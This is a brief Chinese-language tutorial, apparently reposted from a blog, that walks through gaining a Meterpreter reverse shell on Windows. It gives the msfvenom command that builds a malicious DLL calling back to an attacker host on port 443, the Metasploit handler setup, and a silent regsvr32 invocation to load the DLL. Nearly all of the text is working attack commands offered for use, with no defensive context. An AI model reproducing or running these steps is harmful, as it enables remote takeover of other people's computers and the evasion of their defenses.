第一步:生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll
第二步:启动MSF等待回连
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.106.10 set LPORT 443 run
第三步:加载dll文件
# 建议加上 /s 和 /u 参数 regsvr32.exe /s /u reverse_tcp.dll
成功反弹shell后在进程列表中会出现rundll32.exe进程,如果退出meterpreter会话则进程消失。
原文地址:https://www.cnblogs.com/dgjnszf/p/12317104.html
时间: 2024-10-04 03:45:50